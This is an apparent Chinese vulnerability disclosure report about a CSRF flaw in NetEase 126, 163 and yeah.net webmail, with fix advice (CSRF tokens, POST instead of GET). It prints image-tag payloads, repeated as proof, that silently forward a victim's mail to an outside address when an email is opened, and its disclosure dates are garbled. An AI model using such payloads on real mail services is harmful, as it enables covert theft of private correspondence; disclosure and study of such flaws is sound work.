漏洞详情

披露情况：

2010-07-07-07-01-2007 细节已通知
2010-08-18： 细节向公众公开

简要描述：

网易存在 CSRF 漏洞，成功攻击可能会给用户带来多种数据。

详细说明：

网易126邮箱存在CSRF漏洞，攻击者一个发给126的邮箱，在邮件中需要用户嵌入一个自动攻击的图片，用户只要打开该邮件，就可以在邮箱中设置只发送给用户的邮箱。
<img src="http://config.mail.126.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http:// config.mail.163.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw /fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />

漏洞证明：

<img src="http://config.mail.126.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http:// config.mail.163.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw /fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />

修复方案：

1.建议添加CSRF Token。
2.修改提交方式GET为POST。